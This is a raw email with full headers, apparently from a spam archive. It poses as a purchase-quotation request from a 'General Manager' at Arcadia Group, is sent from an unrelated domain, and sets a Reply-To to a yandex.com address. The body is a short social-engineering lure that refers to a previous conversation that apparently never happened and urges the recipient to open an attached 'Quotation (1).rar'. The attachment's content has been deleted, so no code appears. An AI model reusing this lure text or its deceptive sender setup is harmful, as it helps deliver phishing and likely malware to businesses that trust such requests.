	by webcloud49.au.syrahost.com with esmtpa (Exim 4.84)
	(envelope-from <florence@kiddieshow1028.com>)
	id 1YXl7Z-0000oL-Qg; Tue, 17 Mar 2015 14:36:57 +0800
        (SquirrelMail authenticated user florence@kiddieshow1028.com)
        Tue, 17 Mar 2015 06:36:57 -0000
Message-ID: <addf7bbc7d35ce1d6ae15ddd6725c362.squirrel@webmail.kiddieshow1028.com>
Date: Tue, 17 Mar 2015 06:36:57 -0000
Subject: our last conversation
From: "florence" <florence@kiddieshow1028.com>
Reply-To: venius.vera@yandex.com
User-Agent: SquirrelMail/1.5.2 [SVN]
MIME-Version: 1.0
Content-Type: multipart/mixed;boundary="----=_20150317063657_60834"
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - webcloud49.au.syrahost.com
X-AntiAbuse: Original Domain - untroubled.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - kiddieshow1028.com
X-Get-Message-Sender-Via: webcloud49.au.syrahost.com: authenticated_id: florence@kiddieshow1028.com
Content-Length: 872

------=_20150317063657_60834
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit


Dear  friend

quotation
I am glad to get your response regarding to the mail I sent to you last time.
Attached is the products sheet for the new items. pls kindly
check the PO and give us your best prices and the cost of delivery
if everything goes
well we can place our order as soon as possible

Thank you in advance.
Waiting for your kind reply.

Best Regards
Florence
General Manager
36 Clarence Street
Kingston-upon-thames
England
Arcadia Group Limited





------=_20150317063657_60834
Content-Type: message/external-body; access-type=x-deleted; length=1449427


Content-Type: application/octet-stream; name="Quotation (1).rar"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Quotation (1).rar"

